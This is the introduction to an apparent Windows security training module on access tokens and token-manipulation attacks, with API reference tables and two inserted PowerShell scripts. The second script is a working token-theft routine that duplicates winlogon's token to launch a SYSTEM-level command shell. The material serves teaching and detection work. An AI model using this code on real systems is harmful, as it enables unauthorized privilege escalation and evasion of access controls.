Summary
This module is centered on understanding access tokens, and the attacks based on access tokens, such as Access Token Manipulation, Access Token Theft, Token impersonation, etc. Additionally, participants will gain hands-on experience in using WinDbg and other tools to analyze processes, tokens, and security descriptors, and monitoring of WINAPI functions.
This module is broken down into sections with accompanying hands-on exercises to practice each of the techniques we cover. The module ends with a practical hands-on skills assessment to gauge your understanding of the various topic areas.
- Introduction
- Intro to Toolset
- Windows Logon Process
- Process Internals and Protection
- Understanding Access Tokens
- Important Token Structures
- Access Checks
- Token Privileges
- Token Enumeration
- Token Manipulation
- Token Theft (T1134.001)
- Token Impersonation
- Make Access Tokens
- Network Authentication
- PPID Spoofing using Access Token
- Detection Opportunities
Students will also gain insight into the inner workings of access tokens, process creation, parent process PID spoofing, and the importance of access control lists (ACLs) and security descriptors in securing system resources. Furthermore, the module covers the techniques used to create new tokens from user credentials, ways to duplicate tokens, creating new processes with stolen tokens, and token impersonation.
The module also covers some useful scenarios, such as the demonstration and detection of token manipulation, escalation to "NT AUTHORITY\SYSTEM", and scenarios showing how kernel drivers detect attacks such as PPID spoofing. As you work through the module, you will see example commands and command output for the various topics introduced. It is worth reproducing as many of these examples as possible to further reinforce the concepts introduced in each section. You can do this in the Pwnbox provided in the interactive sections or on your own virtual machine.
You can start and stop the module at any time and pick up where you left off. There is no time limit or "grading," but you must complete all of the exercises and the skills assessment to receive the maximum number of cubes and have this module marked as complete in any paths you have chosen.
The module is classified as "Hard" because it assumes working knowledge of debuggers and analysis tools and an understanding of the Windows command line.
A firm grasp of the following modules can be considered prerequisites for successful completion of this module:
- Introduction to Windows Command Line
- Introduction to Malware Analysis
- Intro to Assembly Language
- Basic understanding of C
Introduction
Authentication and authorization are foundational concepts that address two fundamental questions in security:
- Authentication (Is the entity who it claims to be?): Authentication ensures that the identity of a user, system, or service is genuine. This verification is typically carried out using methods such as passwords, biometrics, or digital certificates. Authentication acts as the initial checkpoint for establishing trust between entities.
- Authorization (What is the entity allowed to do?): Once authentication is successful, authorization defines the scope of actions or resources the entity is permitted to access. It enforces access controls to ensure that users, applications, or systems operate within their designated permissions.
In Windows environments, authentication and authorization are structured around security principals: entities capable of initiating actions or requests, such as users, computers, groups and services. To implement authentication and authorization, Windows relies on two key mechanisms, logon sessions and access tokens.
- Logon Session: A logon session is created whenever a user successfully signs in to a system. It uniquely identifies the authenticated user and holds their session-specific authentication data, so that everything the user subsequently does can be tied back to that logon.
- Access Token: After authentication, Windows generates an access token, which serves as the security context for the user's processes and threads. This token contains essential details, such as:
  - The user's security identifier (SID)
  - Membership in security groups
  - Assigned privileges
  - Integrity level and associated claims
Access tokens are attached to processes (as primary tokens) or threads (as impersonation tokens) and govern what resources they can access and the actions they can execute. A deeper understanding of tokens is essential for understanding access token manipulation. According to MITRE, Access Token Manipulation (T1134) falls under the Privilege Escalation (TA0004) and Defense Evasion (TA0005) tactics. It involves an adversary manipulating access tokens to bypass access controls and gain unauthorized access to resources within a system or network.
![](/storage/modules/256/at-mitre_.png)
Access Token Manipulation Techniques
The diagram below shows some common access token manipulation scenarios, including how an access token is stolen from a target process and how an access token is created using stolen credentials. Once the access token is obtained, it can be used to perform further actions (such as PPID Spoofing (T1134.004)). The access token manipulation techniques shown in the diagram are:
- Token Privilege Modification
- Create Process with Token
- Token Impersonation
This module presents a comprehensive analysis of access token manipulation techniques used by attackers and provides guidance on detecting these threats.
Access token manipulation is a prevalent strategy used by adversaries to escalate privileges and avoid detection in Windows environments. The MITRE ATT&CK page for Access Token Manipulation (T1134) provides detailed information in the Procedure Examples section on how various threat actors execute this technique and its sub-techniques.
![](/storage/modules/256/procedure.png)
For instance, the screenshot above shows adversaries manipulating an access token to enable specific privileges, such as SeDebugPrivilege. This privilege lets its holder open any process regardless of that process's DACL, including processes owned by other users or running as SYSTEM (protected processes are the exception), and therefore debug or manipulate them.
We can also observe that the AdjustTokenPrivileges() WinAPI function is used. This function enables or disables privileges in an access token. Privileges such as SeDebugPrivilege are present but disabled by default in an elevated administrator's token, so adversaries call AdjustTokenPrivileges() to enable them before carrying out malicious actions. Note that the function can only toggle privileges the token already holds; it cannot add new ones, which is why the technique starts from a context (typically an elevated administrator) whose token already carries the privilege.
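The following PowerShell script is an added example, not part of the module or of any of the procedure examples above. It enumerates the same token contents listed earlier (user SID, integrity level, privileges) and then attempts to enable SeDebugPrivilege with AdjustTokenPrivileges(), checking for ERROR_NOT_ALL_ASSIGNED, which is how the API signals that the privilege is simply not in the token. The P/Invoke declarations and function names (`TokenApi`, `Get-TokenPrivileges`, `Enable-TokenPrivilege`) are this example's own; it assumes Windows PowerShell 5.1 or PowerShell 7 on Windows.

```powershell
# Added example (not part of the module): inspect the current process token and try to
# enable SeDebugPrivilege the way AdjustTokenPrivileges() is used in the procedures above.
# Assumes Windows PowerShell 5.1 / PowerShell 7 on Windows; the P/Invoke shim below is ours.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class TokenApi {
    [StructLayout(LayoutKind.Sequential)] public struct LUID { public int LowPart; public int HighPart; }
    [StructLayout(LayoutKind.Sequential)] public struct LUID_AND_ATTRIBUTES { public LUID Luid; public uint Attributes; }
    // TOKEN_PRIVILEGES with exactly one entry, flattened so PowerShell can set the fields directly
    [StructLayout(LayoutKind.Sequential)] public struct TOKEN_PRIVILEGES { public uint PrivilegeCount; public LUID Luid; public uint Attributes; }
    public const uint TOKEN_QUERY = 0x0008, TOKEN_ADJUST_PRIVILEGES = 0x0020, SE_PRIVILEGE_ENABLED = 0x2;
    public const int TokenPrivileges = 3, TokenIntegrityLevel = 25, ERROR_NOT_ALL_ASSIGNED = 1300;
    [DllImport("kernel32.dll")] public static extern IntPtr GetCurrentProcess();
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool GetTokenInformation(IntPtr token, int cls, IntPtr buf, int len, out int needed);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeValue(string sys, string name, out LUID luid);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool LookupPrivilegeName(string sys, ref LUID luid, StringBuilder name, ref int len);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool AdjustTokenPrivileges(IntPtr token, bool disableAll, ref TOKEN_PRIVILEGES state, uint len, IntPtr prev, IntPtr retLen);
}
'@
$M = [Runtime.InteropServices.Marshal]

function Get-TokenInfoBuffer([IntPtr]$tok, [int]$class) {
    # Two-call pattern: the first call reports the required size, the second fills the buffer (caller frees it).
    $len = 0
    [void][TokenApi]::GetTokenInformation($tok, $class, [IntPtr]::Zero, 0, [ref]$len)
    $buf = $M::AllocHGlobal($len)
    if (-not [TokenApi]::GetTokenInformation($tok, $class, $buf, $len, [ref]$len)) {
        $M::FreeHGlobal($buf); throw "GetTokenInformation($class) failed: $($M::GetLastWin32Error())"
    }
    return $buf
}

function Get-TokenPrivileges([IntPtr]$tok) {
    $buf = Get-TokenInfoBuffer $tok ([TokenApi]::TokenPrivileges)
    try {
        $count = $M::ReadInt32($buf)
        for ($i = 0; $i -lt $count; $i++) {
            # DWORD PrivilegeCount is followed by an array of 12-byte LUID_AND_ATTRIBUTES entries.
            $entry = $M::PtrToStructure([IntPtr]::Add($buf, 4 + 12 * $i), [type][TokenApi+LUID_AND_ATTRIBUTES])
            $name = [System.Text.StringBuilder]::new(256); $n = $name.Capacity; $luid = $entry.Luid
            [void][TokenApi]::LookupPrivilegeName($null, [ref]$luid, $name, [ref]$n)
            [pscustomobject]@{ Name = $name.ToString(); Enabled = (($entry.Attributes -band [TokenApi]::SE_PRIVILEGE_ENABLED) -ne 0) }
        }
    } finally { $M::FreeHGlobal($buf) }
}

function Get-TokenIntegrityLevel([IntPtr]$tok) {
    $buf = Get-TokenInfoBuffer $tok ([TokenApi]::TokenIntegrityLevel)
    try {
        # TOKEN_MANDATORY_LABEL starts with SID_AND_ATTRIBUTES { PSID Sid; DWORD Attributes }; the SID is S-1-16-<level>.
        $sid = [System.Security.Principal.SecurityIdentifier]::new($M::ReadIntPtr($buf))
        $rid = [int]$sid.Value.Split('-')[-1]
        $names = @{ 0 = 'Untrusted'; 4096 = 'Low'; 8192 = 'Medium'; 12288 = 'High'; 16384 = 'System' }
        return "$($sid.Value) ($($names[$rid]))"
    } finally { $M::FreeHGlobal($buf) }
}

function Enable-TokenPrivilege([IntPtr]$tok, [string]$privName) {
    $luid = New-Object TokenApi+LUID
    if (-not [TokenApi]::LookupPrivilegeValue($null, $privName, [ref]$luid)) { throw "Unknown privilege $privName" }
    $tp = New-Object TokenApi+TOKEN_PRIVILEGES
    $tp.PrivilegeCount = 1; $tp.Luid = $luid; $tp.Attributes = [TokenApi]::SE_PRIVILEGE_ENABLED
    $ok = [TokenApi]::AdjustTokenPrivileges($tok, $false, [ref]$tp, 0, [IntPtr]::Zero, [IntPtr]::Zero)
    $err = $M::GetLastWin32Error()
    # AdjustTokenPrivileges returns TRUE even when nothing was enabled: the privilege must already be
    # in the token. ERROR_NOT_ALL_ASSIGNED means it is not, and no call can add it to this token.
    if ($ok -and $err -eq [TokenApi]::ERROR_NOT_ALL_ASSIGNED) { return 'NotHeld' }
    if (-not $ok) { throw "AdjustTokenPrivileges failed: $err" }
    return 'Enabled'
}

$tok = [IntPtr]::Zero
$access = [TokenApi]::TOKEN_QUERY -bor [TokenApi]::TOKEN_ADJUST_PRIVILEGES
if (-not [TokenApi]::OpenProcessToken([TokenApi]::GetCurrentProcess(), $access, [ref]$tok)) {
    throw "OpenProcessToken failed: $($M::GetLastWin32Error())"
}
try {
    "User:      $([Security.Principal.WindowsIdentity]::GetCurrent().User.Value)"
    "Integrity: $(Get-TokenIntegrityLevel $tok)"
    "SeDebugPrivilege: $(Enable-TokenPrivilege $tok 'SeDebugPrivilege')"
    Get-TokenPrivileges $tok | Format-Table -AutoSize
} finally { [void][TokenApi]::CloseHandle($tok) }
```

Run it twice: from an elevated administrator prompt the integrity level is High, the call reports `Enabled` and SeDebugPrivilege shows `Enabled = True` in the listing; from a standard user or a non-elevated (filtered) administrator prompt it reports `NotHeld`, because the privilege is absent from that token altogether, which is exactly the limit the paragraph above describes.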
![](/storage/modules/256/examples.png)
There are also attempts to escalate privileges to NT AUTHORITY\SYSTEM, the most privileged local account on a Windows system, roughly equivalent to root or the superuser on Unix-based systems. Adversaries often target this account to gain full control over a compromised system.
![](/storage/modules/256/example1.png)
Adversaries have also employed access token manipulation techniques to create new tokens from stolen credentials. They have used impersonation to access resources or perform actions that require higher privileges than those of the current user. This technique involves a thread assuming the identity of another user or security principal, typically to perform actions on their behalf. The screenshot below provides examples of various software/groups that have utilized this technique in real-world attacks.
![](/storage/modules/256/example2.png)
API Functions Related to Access Tokens
API functions related to access tokens allow applications to manage and manipulate these tokens, enabling scenarios like impersonation, privilege elevation, and security checks. Some key API functions related to access tokens are categorized as follows:
Token Creation
These functions obtain a handle to an existing token or create a new one by duplicating or restricting it:

| Function Name | Description |
|---|---|
| OpenProcessToken | Opens the primary access token associated with a process. |
| OpenThreadToken | Opens the impersonation token associated with a thread; fails with ERROR_NO_TOKEN if the thread is not impersonating. |
| DuplicateToken | Duplicates an existing access token as an impersonation token with the same properties. |
| DuplicateTokenEx | Duplicates an access token and lets you choose the desired access, impersonation level and token type (primary or impersonation). |
| CreateRestrictedToken | Creates a restricted token from an existing one by deleting privileges, marking SIDs as deny-only, or adding restricting SIDs. |
Token Manipulation
These functions modify or adjust the properties and privileges of tokens:

| Function Name | Description |
|---|---|
| AdjustTokenPrivileges | Enables or disables privileges already present in a token; it cannot add a privilege the token does not hold (GetLastError() reports ERROR_NOT_ALL_ASSIGNED in that case). |
| AdjustTokenGroups | Enables or disables groups in a token; groups flagged SE_GROUP_MANDATORY cannot be disabled. |
| SetTokenInformation | Changes properties of a token, such as its default DACL, owner, primary group or session ID. |
Token Query
These functions retrieve information about a token:

| Function Name | Description |
|---|---|
| GetTokenInformation | Retrieves one class of token information, such as the user SID, groups, privileges, integrity level or token type. |
| CheckTokenMembership | Checks whether a given SID is present and enabled in a token. |
| IsTokenRestricted | Determines whether a token contains restricting SIDs, i.e. whether it was produced by CreateRestrictedToken. |
Token Impersonation
These functions let a thread temporarily run under a different security context (impersonation is always per thread, never per process):

| Function Name | Description |
|---|---|
| ImpersonateLoggedOnUser | Makes the calling thread impersonate the security context of a logged-on user, given a token from LogonUser or a duplicated token. |
| ImpersonateSelf | Gives the calling thread an impersonation token copied from the process token, so the thread can adjust its own privileges or be access-checked without altering the process token. |
| RevertToSelf | Ends impersonation, returning the thread to the process's primary security context. |
Miscellaneous
Other important functions related to tokens:

| Function Name | Description |
|---|---|
| LogonUser | Authenticates a user with a user name, domain and password, creates a new logon session and returns a primary token for it. |
| CreateProcessAsUser | Creates a new process under the supplied primary token; the caller normally needs SeIncreaseQuotaPrivilege and, unless the token is assignable, SeAssignPrimaryTokenPrivilege. |
| CreateProcessWithTokenW | Also creates a process under a primary token, but through the Secondary Logon service, so the caller needs SeImpersonatePrivilege instead of SeAssignPrimaryTokenPrivilege. |
| SetThreadToken | Assigns an impersonation token to a thread (passing NULL removes it). |
For more detail on access tokens and the related WinAPI functions, refer to the Microsoft documentation.
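The PowerShell script below is an added example (not part of the module) that chains the function categories above into the "Create Process with Token" scenario: open a process, open its primary token, duplicate it into a new primary token, and hand that token to CreateProcessWithTokenW. It assumes an elevated administrator session on Windows (so that SeDebugPrivilege and SeImpersonatePrivilege are in the caller's token), defaults to winlogon.exe as the source process, and uses ntdll's RtlAdjustPrivilege as a one-call stand-in for LookupPrivilegeValue + AdjustTokenPrivileges to keep the block short. The `Seclogon` shim and `Start-ProcessWithStolenToken` are this example's own names.

```powershell
# Added example (not part of the module): duplicate another process's primary token and start a
# new process under it. Assumes an elevated admin session on Windows; the P/Invoke shim is ours.
Add-Type -TypeDefinition @'
using System;
using System.Runtime.InteropServices;
public static class Seclogon {
    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
    public struct STARTUPINFO {
        public int cb; public string lpReserved, lpDesktop, lpTitle;
        public int dwX, dwY, dwXSize, dwYSize, dwXCountChars, dwYCountChars, dwFillAttribute, dwFlags;
        public short wShowWindow, cbReserved2; public IntPtr lpReserved2, hStdInput, hStdOutput, hStdError;
    }
    [StructLayout(LayoutKind.Sequential)]
    public struct PROCESS_INFORMATION { public IntPtr hProcess, hThread; public int dwProcessId, dwThreadId; }
    public const uint PROCESS_QUERY_INFORMATION = 0x0400, TOKEN_DUPLICATE = 0x0002, TOKEN_QUERY = 0x0008;
    public const uint MAXIMUM_ALLOWED = 0x02000000, CREATE_NEW_CONSOLE = 0x10;
    public const int SecurityImpersonation = 2, TokenPrimary = 1, SE_DEBUG_PRIVILEGE = 20;
    // RtlAdjustPrivilege takes 1-byte BOOLEANs, hence the U1 marshalling
    [DllImport("ntdll.dll")] public static extern int RtlAdjustPrivilege(int priv, [MarshalAs(UnmanagedType.U1)] bool enable, [MarshalAs(UnmanagedType.U1)] bool thread, [MarshalAs(UnmanagedType.U1)] out bool wasEnabled);
    [DllImport("kernel32.dll", SetLastError = true)] public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll")] public static extern bool CloseHandle(IntPtr h);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool OpenProcessToken(IntPtr proc, uint access, out IntPtr token);
    [DllImport("advapi32.dll", SetLastError = true)] public static extern bool DuplicateTokenEx(IntPtr token, uint access, IntPtr attrs, int level, int type, out IntPtr dup);
    [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)] public static extern bool CreateProcessWithTokenW(IntPtr token, uint logonFlags, string app, string cmdLine, uint flags, IntPtr env, string dir, ref STARTUPINFO si, out PROCESS_INFORMATION pi);
}
'@
$M = [Runtime.InteropServices.Marshal]

function Start-ProcessWithStolenToken(
    [int]$SourcePid = (Get-Process -Name winlogon | Select-Object -First 1).Id,
    [string]$Image = "$env:SystemRoot\System32\cmd.exe") {
    # 1. SeDebugPrivilege makes OpenProcess succeed regardless of the target's DACL (protected processes excepted).
    #    It must already be in our token; RtlAdjustPrivilege only flips it on and fails (STATUS_PRIVILEGE_NOT_HELD) otherwise.
    $was = $false
    if ([Seclogon]::RtlAdjustPrivilege([Seclogon]::SE_DEBUG_PRIVILEGE, $true, $false, [ref]$was) -ne 0) {
        throw 'SeDebugPrivilege is not in this token; run from an elevated administrator prompt'
    }
    $hProc = [Seclogon]::OpenProcess([Seclogon]::PROCESS_QUERY_INFORMATION, $false, $SourcePid)
    if ($hProc -eq [IntPtr]::Zero) { throw "OpenProcess($SourcePid) failed: $($M::GetLastWin32Error())" }
    $hTok = [IntPtr]::Zero; $hDup = [IntPtr]::Zero
    try {
        # 2. Open the target's primary token; TOKEN_DUPLICATE is all we need besides TOKEN_QUERY.
        $tokAccess = [Seclogon]::TOKEN_DUPLICATE -bor [Seclogon]::TOKEN_QUERY
        if (-not [Seclogon]::OpenProcessToken($hProc, $tokAccess, [ref]$hTok)) { throw "OpenProcessToken failed: $($M::GetLastWin32Error())" }
        # 3. Duplicate it into a new primary token we own; the original stays attached to its process.
        if (-not [Seclogon]::DuplicateTokenEx($hTok, [Seclogon]::MAXIMUM_ALLOWED, [IntPtr]::Zero,
                [Seclogon]::SecurityImpersonation, [Seclogon]::TokenPrimary, [ref]$hDup)) {
            throw "DuplicateTokenEx failed: $($M::GetLastWin32Error())"
        }
        # 4. CreateProcessWithTokenW runs through the Secondary Logon service and needs SeImpersonatePrivilege,
        #    which an elevated admin has; CreateProcessAsUser would instead need SeAssignPrimaryTokenPrivilege.
        $si = New-Object Seclogon+STARTUPINFO; $si.cb = $M::SizeOf([type][Seclogon+STARTUPINFO])
        $pi = New-Object Seclogon+PROCESS_INFORMATION
        if (-not [Seclogon]::CreateProcessWithTokenW($hDup, 0, $Image, $null, [Seclogon]::CREATE_NEW_CONSOLE,
                [IntPtr]::Zero, $null, [ref]$si, [ref]$pi)) {
            throw "CreateProcessWithTokenW failed: $($M::GetLastWin32Error())"
        }
        [void][Seclogon]::CloseHandle($pi.hThread); [void][Seclogon]::CloseHandle($pi.hProcess)
        return $pi.dwProcessId
    } finally {
        foreach ($h in $hDup, $hTok, $hProc) { if ($h -ne [IntPtr]::Zero) { [void][Seclogon]::CloseHandle($h) } }
    }
}

$newPid = Start-ProcessWithStolenToken
"Started PID $newPid under the duplicated token; run 'whoami' in the new console to confirm the identity."
```

Each step maps to one of the tables above (OpenProcessToken from Token Creation, DuplicateTokenEx to turn the handle into a primary token we control, CreateProcessWithTokenW from Miscellaneous), and each failure reports the Win32 error so you can tell apart a DACL denial, a missing privilege, or a stopped Secondary Logon service. The same sequence, with the corresponding kernel-side token copies and the seclogon service as the parent, is what the detection sections later in the module look for.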
Moving On
To understand access tokens and the attack techniques based on them, we'll go through the fundamental concepts related to processes and tokens, explore different ways to create processes, and then examine the attack scenarios and respective detection opportunities in the following sections. In the upcoming section, we'll cover some basic concepts of WinDbg, debuggers, disassemblers, and other tools used throughout this module.